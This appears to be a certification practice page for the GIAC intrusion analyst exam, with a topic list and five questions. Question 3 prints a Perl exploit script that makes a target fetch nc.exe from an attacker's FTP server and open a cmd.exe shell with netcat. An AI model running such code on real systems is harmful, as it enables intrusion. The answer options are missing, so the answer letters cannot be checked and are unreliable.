
GIAC Certified Intrusion Analyst Exam

Certification Provider: GIAC
Exam Name: GIAC Certified Intrusion Analyst
Duration: 240 Minutes
Number of questions in our database: 364
Exam Version: Sep. 19, 2023
Exam Official Topics:
  • Topic 1: Demonstrate an understanding of how DNS works for both legitimate and malicious purposes/ IDS Fundamentals and Network Architecture
  • Topic 2: Demonstrate knowledge relating to packet crafting and manipulation/ Demonstrate understanding of the TCP/IP communications model and link layer operations
  • Topic 3: Demonstrate competence in analyzing data from multiple sources as part of a forensic investigation/ Demonstrate ability to craft tcpdump filters that match on given criteria
  • Topic 4: Demonstrate the ability to analyze network and application traffic to identify both normal and malicious behaviors/ Demonstrate an understanding of IDS tuning methods and correlation issues
  • Topic 5: Demonstrate knowledge and skill relating to application layer protocol dissection and analysis/ How to identify fragmentation and fragmentation-based attacks in packet captures
  • Topic 6: Demonstrate knowledge of fundamental IDS concepts, such as network architecture options/ Demonstrate understanding of how fragmentation works
  • Topic 7: Demonstrate an understanding of SiLK and other tools to perform network traffic and flow analysis/ Create effective IDS rules to detect varied types of malicious activity
  • Topic 8: Demonstrate understanding of the UDP and ICMP protocols and the ability to discern between typical and anomalous behavior/ Advanced Analysis and Network Forensics

Free GIAC GIAC Certified Intrusion Analyst Exam Actual Questions

The questions for GIAC Certified Intrusion Analyst were last updated on Sep. 19, 2023

Question #1

Steve works as a Network Administrator for Blue Tech Inc. All client computers in the company run the Windows Vista operating system. He often travels long distances on official duty. While traveling, he connects to the office server through his laptop by using remote desktop connection.

He wants to run an application that is available on the server of the company. When he connects to the server, he gets a message that the connection is blocked by the firewall. He returns to his office to resolve the issue. He opens the Windows Firewall Settings dialog box. What actions should he perform in the dialog box given below to accomplish the task?

Correct Answer: A

Question #2

John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

Correct Answer: B

Question #3

Adam, a malicious hacker, performs an exploit, which is given below:

#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Correct Answer: D

Question #4

Where is the Hypertext Transfer Protocol (HTTP) used?

Correct Answer: E

Question #5

Which of the following are well-known ports?

Each correct answer represents a complete solution. Choose two.

Correct Answer: A, B

